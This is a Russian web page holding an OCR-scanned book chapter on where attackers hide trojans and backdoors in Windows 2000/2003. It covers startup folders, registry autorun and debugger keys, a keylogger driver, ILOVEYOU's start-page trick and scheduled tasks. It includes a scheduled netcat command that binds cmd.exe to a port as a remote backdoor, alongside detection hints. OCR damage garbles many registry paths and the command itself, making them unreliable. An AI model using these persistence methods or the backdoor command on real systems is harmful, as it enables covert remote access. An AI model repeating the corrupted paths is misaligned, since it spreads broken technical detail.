На главную | Содержание | Назад | Вперёд
Наши друзья

 

 

Где прячутся "троянские" программы

Теперь вы знаете, какие программы можно внедрить в вашу систему. А где же хакеры ча­ще всего прячут эти программы, чтобы они работали как можно дольше?
Чаще всего "потайные ходы" и "троянские" программы размещают в таких местах, где они гарантированно переживут перезагрузку системы или другое глобальное для системы со­,   бытие. В Windows 2000/2003 для этого есть несколько "подходящих мест".
Каталоги автозапуска
Один из наиболее известных каталогов автозапуска— %userprofile%\start menu\ programsA startup. Любые скопированные в этот каталог программы будут выполнены при загрузке системы. Также, независимо от того, кто интерактивно подключается к системе, во время загрузки будут запущены любые программы, скопированные в каталоги С:\Documents И Settings\All Users\start menu\programs\startup.

Параметры реестра для автозагрузки
Следующие параметры реестра определяют, какие команды/программы будут выполнены при загрузке системы:
Т HKLMVSoftware\MicrosoftWindows\CurrentVersion\Run
■ HKLMXSoftware\MicrosoftWindows\CurrentVersion\RunOnce
* HKLM\3oftware\MicrosoftWindows\CurrentVersion\RunOnceEx
Только для Windows 2000:
V  HKLM\SoftwareSMicroso£t\VSindows\CurreritVersion\policies\Ti^lorer\Ilun
Значения, указанные в этих параметрах, будут использоваться при каждой загрузке системы (за более подробной информацией обращайтесь к статье базы знаний Microsoft Q270035). Для систем Windows 95/98/Ме доступны и другие параметры реестра (см. статью базы знаний Mi­crosoft Q179365).
Следующий параметр реестра определяет, какой "аварийный" отладчик будет запушен после возникновения исключения в программе пользовательского режима:
Т HKLMNSoftware\MicrosoftWindows NT\CurrencVersion\AeDebug
В этот раздел реестра можно добавлять вложенные параметры, которые указывают путь к отладчику или другой программе, запускаемой после возникновения исключительной ситуа­ции (за более подробной информацией обращайтесь к статье базы знаний Microsoft Q121434). Злоумышленник может установить значение этого параметра на запуск своей программы. То есть при отказе Windows-программы будет запушена программа хакера. Возможности хакера в этом случае практически безграничны, поскольку он может сделать что угодно от установки "потайного хода" до выполнения любых других вредоносных действий.
Следующий параметр реестра определяет, какие системные службы будут запускаться вместе с отладчиком:
Т HKLMNSoffcware\Microsoft\Windows NT\CurrentVersion\Image File Execution options
В этот параметр реестра можно добавить значение Debugger типа REG_SZ, определяю­щее полный путь к отладчику или к другой Программе, которая должна запускаться при за­пуске служб (за более подробной информацией обращайтесь к статье базы знаний Microsoft Q170738).
Следующий параметр реестра определяет, какая программа будет вызвана при любой по­пытке запуска программы С расширением файла .ЕХЕ:
Т HKEY_CLASSES_ROOT\exefile\shell\open\commarid
Данный параметр должен содержать одно значение типа REG_SS с названием Default и значением %*. Если там записано что-то другое, то, скорее всего, это "троянская"
программа, вирус или "потайной ход" в систему. За более подробной информацией обращай­тесь к статье базы знаний Microsoft Q250931.
Если учетным записям пользователей предоставлено право записи для любого из пере­численных параметров, то злоумышленник может задать для одного из параметров такое зна­чение, которое приведет к запуску кода злоумышленника во время загрузки системы, после возникновения события отладки (такого как исключительная ситуация в программе пользо­вательского режима, которая обычно приводит к включению отладчика) или даже в случае, когда пользователь запускает исполняемый файл. Код злоумышленника должен выполняться с высоким уровнем привилегий а потенциально может выполнять на взломанной системе ка­кие угодно действия, в том числе и расширение прав учетной записи хакера до уровня прав администратора.
Драйверы
В главе 8, "Расширение сферы влияния", мы показали, как использовать загружаемые при запуске системы драйверы для создания "потайного хода" в систему Windows 2000/2003. Чтобы драйвер Amecisco Invisible Keylogger Stealth (IKS, файл iks.sys, естественно, переименован­ный) загружался вместе с ядром Windows 2000/2003, его можно скопировать в каталог %systeraroot%\system32\drivers, процесс загрузки ядра обычно для пользователя за кон­солью не виден. Также эта программа записывает несколько значений в реестр по адресу HKLMVSYSTEMXCurrentCoritrolSetxServicesViks (здесь тоже параметр iks, скорее всего, будет переименован в соответствии с заданным хакером именем файла драйвера). Если предва­рительно была сделана копия реестра (например, с помощью утилиты DumpReg от SomarSoft), то установку драйвера IKS можно очень легко выявить. Файл драйвера IKS также показывает свои исходные данные при просмотре его свойств через программу Windows Explorer (проводник Windows). ■
Использование для загрузки кода начальной страницы Web-браузера
Про грамма-"червь" на языке Visual Basic ILOVEYOU,. выпущенная в мае 2000 года (за бо­лее подробной информацией о червях на языке VBS обращайтесь к главе 13, "Хакинг Internet-клиентов Microsoft"), продемонстрировала использование весьма неожиданного способа запуска исполняемого кода с помощью загрузки начальной страницы Web-браузера.
"Червь" ILOVEYOU изменял настройки для начальной страницы браузера Internet Ex­plorer таким образом, что ссылка указывала на страницу, с которой загружался исполняемый файл WlN-BUGSFlX.exe. Ссылка выбиралась случайным образом из набора адресов сле­дующего шаблона.
http: //www.skyi.net .net/ - [переменная] I (длинная_строка_символов] /WIN-BUGSFIX.exe
Этот адрес URL записывался в параметр реестра HKCUNSof tware\Microsof tMnternet Explorer\Ма in \ St art Раде. Кроме этого, червь изменял несколько других параметров рее­стра, один из которых запускал загруженный файл после перезагрузки (при условии, что он на­ходился в системном каталоге), а другой удалял исходные настройки начальной страницы.
HKLM\So£tware\Kicroso£t\Windows\CurrentVersion\Run\WIN-BUGSFIX HKCU\Software\Microsoft\Internet Explorer\Main\Start Page\about:blank
Конечно же, в зависимости от степени доверчивости пользователя, запустившего Web-браузер, файл мог быть выполнен и без перезагрузки системы. С настройками по умолчанию последние версии программы Internet Explorer спрашивают разрешения пользователя перед загрузкой файлов тех типов, которые могут выполнять команды, в том числе . ЕХЕ и .сом-файлов. Раньше такой файл мог быть выполнен сразу при запуске Web-браузера.
Запланированные задачи
Среди файлов автозагрузки очень удобно прятать "потайные ходы", но для этой цели можно использовать и запланированные задачи. В Windows 2000/2003 такую возможность обеспечивает служба планировщика (служба Schedule, доступ к которой происходит через команду at). Учитывая тот факт, что служба Task Scheduler запускается на серверах Win­dows Server 2003 по умолчанию, эта служба становится идеальным кандидатом для реализа­ции планов хакера. Установив регулярно запускаемую программу для создания "потайного хода", злоумышленник получает гарантию постоянно запущенной службы, которая всегда готова выполнить "приказы".
Например, для создания простого "потайного хода", можно периодически в одно и то же назначенное время запускать программу netcat.
C:\>at W192.168.202.44 12:00А /avary-.l ""no -d -L -р 80ВО -в cmd.exe""
Added a new job with job ID = 2
Эта команда каждый день в 12:00 запускает новую программу для соединения с системой, ожидающую подключения к порту 8080. При отсутствии фильтров или брандмауэров между компьютером хакера и взломанной системой (192 .168 . 202 . 44), для доступа к командной
строке удаленной системы злоумышленнику достаточно подключиться к ней с помощью ути­литы netcat, периодически удаляя накопившиеся запущенные программы netcat, которые ожидают соединения. Или можно создать командный файл, который сначала будет прове­рять, не запущена ли уже служба netcat, и при необходимости запускать ее.
Программы, которые запускаются с помощью команды at, выполняются справами учетной записи system— наиболее мощной учетной записи для локальной машины.

 

На главную | Содержание | Назад | Вперёд
 
Яндекс.Метрика